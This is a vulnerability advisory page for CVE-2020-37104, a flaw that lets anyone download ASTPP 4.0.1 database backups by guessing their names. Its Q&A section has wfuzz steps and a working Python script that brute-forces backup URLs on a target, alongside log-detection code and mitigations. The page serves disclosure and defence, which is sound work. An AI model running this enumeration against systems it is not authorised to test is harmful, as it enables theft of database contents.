CVE-2020-37104
Information Disclosure in ASTPP 4.0.1 via Predictable Backup Files
Publication date: 2026-02-11
Last updated on: 2026-02-20
Assigner: VulnCheck
Description
CVSS Scores
EPSS Scores
| Metric | Value |
|---|---|
| Probability | |
| Percentile | |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| inextrix | astpp | 4.0.1 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-538 | The product places sensitive information into files or directories that are accessible to actors who are allowed to have access to the files, but not to the sensitive information. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
ASTPP version 4.0.1 contains an information disclosure vulnerability that allows unauthenticated attackers to download database backup files by predicting the backup filename pattern.
The backup files are written to a web-accessible directory with filenames built from the backup date and a six-digit number representing the time the backup was taken. The date is usually guessable, and the six digits have at most 1,000,000 possible values (only 86,400 if they are a time of day in HHMMSS form), so the full name is within reach of a brute-force search.
Attackers can generate the list of candidate six-digit values and use a fuzzing tool to substitute each one into the backup download URL until the server returns a file.
Once a valid filename is found, the attacker can download the database backup without any authentication, gaining access to everything stored in the database.
How can this vulnerability impact me?
This vulnerability allows attackers to exfiltrate sensitive database information without any authentication.
Since the database backup files can be downloaded by guessing filenames, confidential data stored in the database can be exposed to unauthorized parties.
This can lead to data breaches, loss of confidentiality, and potential misuse of sensitive information contained in the database backups.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
I don't know
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Confirm exposure the same way an attacker would: fuzz the backup download URL for the predictable filenames. Test only systems you are authorised to assess, and expect up to one million requests per date.
- Generate the candidate list of six-digit suffixes (000000 to 999999) with a tool such as crunch. If the digits are a time of day (HHMMSS), restricting the list to the 86,400 well-formed values cuts the run by more than 90%.
- Use a web fuzzing tool such as wfuzz to substitute each candidate into http://target/database_backup/astpp_YYYYMMDDFUZZ.sql.gz, with YYYYMMDD set to the date of the backup you want to find (one date per run).
- Filter for HTTP 200 responses, which identify existing backup files. A 403 on every request means the web server is refusing access to the directory; a 200 on every request means a catch-all page is being served and the status code alone is not a usable signal.
- Once a valid filename is identified, download the file with wget or a similar tool and confirm it is a real archive rather than an error page.
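The enumeration and probe described in the steps above, together with the matching access-log check a defender would run, as an added example written for this page (it is not the ASTPP project's code nor part of the advisory). The URL layout http://target/database_backup/astpp_YYYYMMDDFUZZ.sql.gz comes from the Q&A; the HHMMSS reading of the six digits, the use of HEAD requests for the probe and the Apache combined log format are assumptions, and the sample log lines are constructed.

```python
"""Enumerate predictable ASTPP backup names, probe them, and spot the scan in logs.

Added example for this page; not the ASTPP project's code. The URL layout is
taken from the advisory text above, everything else is an assumption.
"""
import re
import sys
import time
import urllib.error
import urllib.request
from typing import Callable, Iterable, Iterator

# Layout from the Q&A above; only the six-digit suffix is unknown.
BACKUP_DIR = "/database_backup/"
NAME_FMT = "astpp_{day}{suffix}.sql.gz"


def candidate_suffixes(time_of_day_only: bool = True) -> Iterator[str]:
    """Yield six-digit suffixes in the order a scanner would try them.

    The page says the digits represent the time. If that is HHMMSS (assumed
    here), only 24*60*60 = 86,400 values are well-formed, not 1,000,000, so
    the time-of-day list is tried first; the full range is the fallback."""
    if time_of_day_only:
        for h in range(24):
            for m in range(60):
                for s in range(60):
                    yield f"{h:02d}{m:02d}{s:02d}"
    else:
        for n in range(1_000_000):
            yield f"{n:06d}"


def candidate_names(day: str, time_of_day_only: bool = True) -> Iterator[str]:
    """Backup filenames for one date given as YYYYMMDD."""
    for suffix in candidate_suffixes(time_of_day_only):
        yield NAME_FMT.format(day=day, suffix=suffix)


def probe(base_url: str, days: Iterable[str],
          fetch: Callable[[str], int]) -> list[str]:
    """Return every URL for which fetch() reports HTTP 200.

    fetch is injected: head_status() below does a real HEAD request, while
    a stub lets the enumeration be exercised offline."""
    found = []
    for day in days:
        for name in candidate_names(day):
            url = base_url.rstrip("/") + BACKUP_DIR + name
            if fetch(url) == 200:
                found.append(url)
    return found


def head_status(url: str, delay: float = 0.05) -> int:
    """HEAD request so a hit is confirmed without downloading the archive.
    The delay keeps a verification scan from hammering the target."""
    time.sleep(delay)
    req = urllib.request.Request(url, method="HEAD")
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status
    except urllib.error.HTTPError as e:
        return e.code


# Defender side: the scan above leaves a burst of 404s for one path prefix
# from one source, and any 200 inside that burst is a completed download.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) ')

# Constructed sample in Apache combined log format (not a real capture).
SAMPLE_LOG = """\
203.0.113.5 - - [11/Feb/2026:10:00:01 +0000] "GET /database_backup/astpp_20260211000000.sql.gz HTTP/1.1" 404 196 "-" "Wfuzz/3.1.0"
203.0.113.5 - - [11/Feb/2026:10:00:01 +0000] "GET /database_backup/astpp_20260211000001.sql.gz HTTP/1.1" 404 196 "-" "Wfuzz/3.1.0"
203.0.113.5 - - [11/Feb/2026:10:00:02 +0000] "GET /database_backup/astpp_20260211000002.sql.gz HTTP/1.1" 404 196 "-" "Wfuzz/3.1.0"
203.0.113.5 - - [11/Feb/2026:10:00:02 +0000] "GET /database_backup/astpp_20260211023015.sql.gz HTTP/1.1" 200 5242880 "-" "Wfuzz/3.1.0"
198.51.100.7 - - [11/Feb/2026:10:00:03 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""


def fuzzing_sources(lines: Iterable[str], threshold: int = 20) -> dict:
    """Group requests under BACKUP_DIR by source IP. Report an IP when it made
    at least `threshold` such requests or when any of them returned 200 (one
    successful download matters regardless of volume)."""
    stats = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not m.group("path").startswith(BACKUP_DIR):
            continue
        entry = stats.setdefault(m.group("ip"), {"attempts": 0, "hits": []})
        entry["attempts"] += 1
        if m.group("status") == "200":
            entry["hits"].append(m.group("path"))
    return {ip: e for ip, e in stats.items()
            if e["attempts"] >= threshold or e["hits"]}


if __name__ == "__main__":
    # usage: python3 probe.py http://target 20260211 [20260212 ...]
    if len(sys.argv) < 3:
        sys.exit("usage: probe.py BASE_URL YYYYMMDD [YYYYMMDD ...]")
    for hit in probe(sys.argv[1], sys.argv[2:], head_status):
        print(hit)
```

The probe takes the fetch function as a parameter so the same enumeration serves a live verification run (head_status) and an offline check; on the defender side, point fuzzing_sources at the real access log and lower the threshold if the scanner spreads requests across many source addresses.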
What immediate steps should I take to mitigate this vulnerability?
Steps that follow directly from the flaw, which is unauthenticated access to predictably named backups in a web-served directory:
- Deny web access to the backup directory (for example a web server rule returning 403 for /database_backup/) and, preferably, write backups to a location outside the document root.
- Remove any backup archives that are currently reachable through the web server, and treat those that were reachable as already disclosed: rotate any credentials or secrets stored in the database.
- Require authentication for backup downloads and give new backups names with an unpredictable component rather than a timestamp alone.
- Review access logs for bursts of 404s against /database_backup/ and for any 200 on an astpp_*.sql.gz path, which indicates a completed download.